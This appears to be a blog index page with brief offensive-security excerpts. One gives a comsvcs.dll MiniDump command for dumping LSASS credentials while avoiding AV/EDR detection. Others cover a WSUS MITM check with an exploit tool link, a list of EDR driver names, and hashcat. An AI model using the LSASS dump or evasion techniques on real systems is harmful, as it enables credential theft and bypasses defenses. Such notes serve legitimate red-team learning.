Dumping LSASS different ways

Reading Time: < 1 minuteA few techniques to avoid AV or EDR detection rundll32 C:\windows\system32\comsvcs.dll MiniDump “[LSASS_PID] dump.bin full” 2. procdump <process id> instead of the word lsass Signed Executable which can be used also 3....

WSUS attacks

Reading Time: < 1 minuteto check if a Win domain is a possible candidate to a MITM WSUS attack check reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer https://github.com/pimps/wsuxploit/ (requires a MITM attack for ex. with bettercap)...

Cortex XDR components

Reading Time: < 1 minuteWdFilter.sys : antimalware, malware WdNisDrv.sys : defender cyvrfsfd.sys : Palo Alto Networks cyvrlpc.sys : Palo Alto Networks tedrdrv.sys : Palo Alto Networks cyvrmtgn.sys : Palo Alto Networks cyverak.sys : cyvera, Palo Alto Networks...

Hashcat

Reading Time: < 1 minutehttps://hashcat.net/hashcat/ and https://github.com/hashcat It’s a tool that let’s you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute...